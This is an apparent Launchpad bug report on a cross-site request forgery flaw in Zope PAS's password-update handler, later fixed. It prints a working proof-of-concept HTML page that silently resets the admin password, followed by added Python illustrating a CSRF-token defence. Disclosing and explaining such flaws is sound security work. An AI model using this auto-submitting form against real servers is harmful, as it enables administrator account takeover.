userManager manage_updateUserPassword csrf

Bug #1079204 reported by Thomas
256
Affects     Status         Importance   Assigned to            Milestone
Zope PAS    Fix Released   Undecided    Tres Seaver (tseaver)

Bug Description

The following HTML allows the admin password to be reset:

<html>
  <body>
    <form action="https://SERVER/acl_users/userManager/manage_updateUserPassword" method="post" name="form">
      user_id : <input value="admin" name="user_id">
      <br>
      password: <input value="zenoss26" name="password">
      <br>
      confirm : <input value="zenoss26" name="confirm">
      <br>
      <input type="submit">
    </form>
    <script>
      document.forms["form"].submit();
    </script>
  </body>
</html>
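The report above is a classic cross-site request forgery: the browser of a logged-in Zope manager is made to POST to manage_updateUserPassword, and the handler trusts the session cookie alone. The standard mitigation is a synchronizer token that only the site's own form can carry. The following Python is an added illustration of that check and is not the Zope PAS fix itself; the handler name, the session id, the user store and the csrf_token field are all assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Server-side secret used to bind tokens to a session (constructed for this example).
SECRET_KEY = secrets.token_bytes(32)


def make_csrf_token(session_id: str) -> str:
    """Derive a per-session synchronizer token as an HMAC over the session id.

    The token is embedded as a hidden field in the legitimate ZMI form, so a
    page on another origin cannot obtain it (same-origin policy) and its
    forged POST arrives without a valid value.
    """
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_password_form(session_id: str) -> str:
    """Hypothetical server-side form: the only place the token is disclosed."""
    token = make_csrf_token(session_id)
    return (
        '<form action="manage_updateUserPassword" method="post">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="user_id"><input name="password" type="password">'
        '<input name="confirm" type="password"><input type="submit"></form>'
    )


def manage_updateUserPassword(request: dict, session_id: str, users: dict) -> str:
    """Hypothetical stand-in for the password handler with a CSRF guard added.

    `request` is a dict with a 'method' and a 'form' mapping; `session_id`
    is whatever the authenticated session cookie resolves to; `users` is
    the password store being protected. Returns a short status string.
    """
    if request.get("method") != "POST":
        return "rejected: POST required"
    form = request.get("form", {})
    # Constant-time comparison of the submitted token against the expected one.
    # A cross-site form cannot know this value, so it is rejected here before
    # any state changes; a token minted for another session also fails.
    expected = make_csrf_token(session_id)
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return "rejected: missing or invalid CSRF token"
    user_id = form.get("user_id")
    if user_id not in users:
        return "rejected: unknown user"
    password = form.get("password", "")
    if not password or password != form.get("confirm"):
        return "rejected: passwords do not match"
    users[user_id] = password
    return "ok"


def demo() -> dict:
    """Replay the reported scenario against the guarded handler (constructed data)."""
    users = {"admin": "original-secret"}
    session = "sess-of-logged-in-manager"
    # 1. The attacker's auto-submitting form from the bug report: no token.
    forged = {"method": "POST",
              "form": {"user_id": "admin", "password": "zenoss26", "confirm": "zenoss26"}}
    forged_result = manage_updateUserPassword(forged, session, users)
    # 2. The same change made through the site's own form, which carries the token.
    legit = {"method": "POST",
             "form": {"user_id": "admin", "password": "new-secret", "confirm": "new-secret",
                      "csrf_token": make_csrf_token(session)}}
    legit_result = manage_updateUserPassword(legit, session, users)
    return {"forged": forged_result, "legit": legit_result, "admin_password": users["admin"]}


if __name__ == "__main__":
    print(demo())
```

The guard must sit in front of every state-changing action, not only this one handler, and it should reject on GET as well, since a forged request can just as easily be an image tag or a link. Checking the Origin or Referer header is a useful second layer but is not a substitute for the token.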

Tres Seaver (tseaver)
Changed in zope-pas:
assignee: nobody → Tres Seaver (tseaver)
status: New → Confirmed
Tres Seaver (tseaver) wrote:
Changed in zope-pas:
status: Confirmed → Fix Committed
Tres Seaver (tseaver)
Changed in zope-pas:
status: Fix Committed → Fix Released
information type: Private Security → Public Security